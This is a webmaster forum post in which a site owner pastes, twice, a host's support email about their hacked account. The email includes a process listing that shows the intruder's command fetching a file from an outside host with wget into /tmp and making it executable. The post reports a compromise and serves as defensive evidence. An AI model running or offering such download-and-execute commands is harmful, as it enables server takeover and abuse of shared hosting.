Webmaster Forums - Webmaster forum for HTML, PHP, ASP, CSS and more - View Single Post

boater · 10-07-2007, 03:51 PM

They got in again and this time crashed my host server. Here is an email from my host:

################################################
## CUSTOMER SERVICE RESPONSE ##
################################################
[Tech: Andrew] 10/04/2007 04:12 PM
<<; Status: Closed >>;
-----------------------------
Your account hacked the server again. We can not allow this as it causes 100s of other users issues. This is completely against our tos. It is grounds for termination of your site. If you want us to continue hosting your site we need to know EXACT which script is hacking the server and how you are going to permently stop this. .....Unfortunately, these files within the directories noted above were not uploaded to your server because of poor operating system, kernel, or PHP base operating tools or the security measures for each. These malicious scripts were allowed onto your server due to out-dated PHP software, uploaded by you to your account, which is the your duty to govern. We do not keep direct tabs on the content uploaded to each account on our server and it is not our duty to monitor the same.Due to this, it becomes the account owner's responsibility to track down the individual PHP software within the accounts and find the compromise that allowed the upload of these m!
alicious scripts. This service does not fall under the normal scope of the Technical assistance we provide on a daily basis. If you would like assistance with tracking these issues down, we are required to charge our normal Administrative fee for the time spent looking over the server. This service will be charged at our normal Administration fee of $100/hour. With a three hour minumum. The information we have provided above should provide you enough evidence to take further actions as you require to prevent future scripts from being uploaded and potentially causing more severe problems or network attacks.In order to have your account reactivated you have several possible options depending on your situation:OPTION 1: ASSUMES that you UNDERSTAND WHAT SCRIPT CAUSED THE PROBLEM, AND you have the ability and knowledge to REMOVE the script and prevent any further problems:ACTION REQUIRED:a. Notify us what specific script caused the problem.b. Notify us of your intention to REMOV!
E the script and prevent any further problems.ONCE this has been done,
we will REOPEN YOUR SITE (if possible).OPTION 2: ASSUMES that you DO NOT UNDERSTAND WHAT SCRIPT CAUSED THE PROBLEM, AND you DO NOT have the ability and knowledge to REMOVE the script and prevent any further problems:ACTION REQUIRED:a. Notify us that you DONT KNOW what happened and you dont know how to fix it.If this is the case, Your site will have to be REFORMATTED. The site will be reopened blank, and you will lose all data on our servers. You will have to Reupload and configure your site, and you will not be allowed to use ANY PHP or CGI that you are not fully confident is safe, secure, up to date, and kept up to date continuously.Below are the processes that caused this issue.nobody 15507 0.0 0.6 11636 6660 ? S 20:56 0:00 \_ /usr/local/apache/bin/httpd -DSSLkercheva 24674 0.0 0.6 49948 6928 ? S 21:31 0:00 | \_ /usr/bin/php admin.phpkercheva 28461 0.0 0.0 3764 1032 ? S 21:46 0:00 | \_ sh -c cd /tmp;wget http://usuarios.arnet.com.ar/larry123/borek.txt;chmod 755 readmekerc!
heva 28506 0.1 0.1 4508 2052 ? R 21:46 0:00 | \_ perl securitykercheva 27702 10.3 0.2 4820 2076 ? S 21:41 0:34 Morgan was herekercheva 27706 1.4 0.2 4820 2100 ? R 21:41 0:04 Morgan was herekercheva 27708 9.8 0.2 5004 2216 ? S 21:41 0:32 Morgan was herekercheva 27778 10.3 0.2 4920 2560 ? S 21:42 0:31 Morgan was herekercheva 27780 3.5 0.2 4920 2584 ? R 21:42 0:10 Morgan was herekercheva 27782 9.9 0.2 5104 2696 ? S 21:42 0:29 Morgan was here
-----------------------------
No Response Yet
################################################
## End Customer Service Response ##
################################################

10-07-2007, 03:51 PM	#18 (permalink)
boater Junior Member Join Date: Sep 2007 Posts: 3	Re: Hacker attcked my swf header. They got in again and this time crashed my host server. Here is an email from my host: ################################################ ## CUSTOMER SERVICE RESPONSE ## ################################################ [Tech: Andrew] 10/04/2007 04:12 PM <<; Status: Closed >>; ----------------------------- Your account hacked the server again. We can not allow this as it causes 100s of other users issues. This is completely against our tos. It is grounds for termination of your site. If you want us to continue hosting your site we need to know EXACT which script is hacking the server and how you are going to permently stop this. .....Unfortunately, these files within the directories noted above were not uploaded to your server because of poor operating system, kernel, or PHP base operating tools or the security measures for each. These malicious scripts were allowed onto your server due to out-dated PHP software, uploaded by you to your account, which is the your duty to govern. We do not keep direct tabs on the content uploaded to each account on our server and it is not our duty to monitor the same.Due to this, it becomes the account owner's responsibility to track down the individual PHP software within the accounts and find the compromise that allowed the upload of these m! alicious scripts. This service does not fall under the normal scope of the Technical assistance we provide on a daily basis. If you would like assistance with tracking these issues down, we are required to charge our normal Administrative fee for the time spent looking over the server. This service will be charged at our normal Administration fee of $100/hour. With a three hour minumum. The information we have provided above should provide you enough evidence to take further actions as you require to prevent future scripts from being uploaded and potentially causing more severe problems or network attacks.In order to have your account reactivated you have several possible options depending on your situation:OPTION 1: ASSUMES that you UNDERSTAND WHAT SCRIPT CAUSED THE PROBLEM, AND you have the ability and knowledge to REMOVE the script and prevent any further problems:ACTION REQUIRED:a. Notify us what specific script caused the problem.b. Notify us of your intention to REMOV! E the script and prevent any further problems.ONCE this has been done, we will REOPEN YOUR SITE (if possible).OPTION 2: ASSUMES that you DO NOT UNDERSTAND WHAT SCRIPT CAUSED THE PROBLEM, AND you DO NOT have the ability and knowledge to REMOVE the script and prevent any further problems:ACTION REQUIRED:a. Notify us that you DONT KNOW what happened and you dont know how to fix it.If this is the case, Your site will have to be REFORMATTED. The site will be reopened blank, and you will lose all data on our servers. You will have to Reupload and configure your site, and you will not be allowed to use ANY PHP or CGI that you are not fully confident is safe, secure, up to date, and kept up to date continuously.Below are the processes that caused this issue.nobody 15507 0.0 0.6 11636 6660 ? S 20:56 0:00 \_ /usr/local/apache/bin/httpd -DSSLkercheva 24674 0.0 0.6 49948 6928 ? S 21:31 0:00 \| \_ /usr/bin/php admin.phpkercheva 28461 0.0 0.0 3764 1032 ? S 21:46 0:00 \| \_ sh -c cd /tmp;wget http://usuarios.arnet.com.ar/larry123/borek.txt;chmod 755 readmekerc! heva 28506 0.1 0.1 4508 2052 ? R 21:46 0:00 \| \_ perl securitykercheva 27702 10.3 0.2 4820 2076 ? S 21:41 0:34 Morgan was herekercheva 27706 1.4 0.2 4820 2100 ? R 21:41 0:04 Morgan was herekercheva 27708 9.8 0.2 5004 2216 ? S 21:41 0:32 Morgan was herekercheva 27778 10.3 0.2 4920 2560 ? S 21:42 0:31 Morgan was herekercheva 27780 3.5 0.2 4920 2584 ? R 21:42 0:10 Morgan was herekercheva 27782 9.9 0.2 5104 2696 ? S 21:42 0:29 Morgan was here ----------------------------- No Response Yet ################################################ ## End Customer Service Response ## ################################################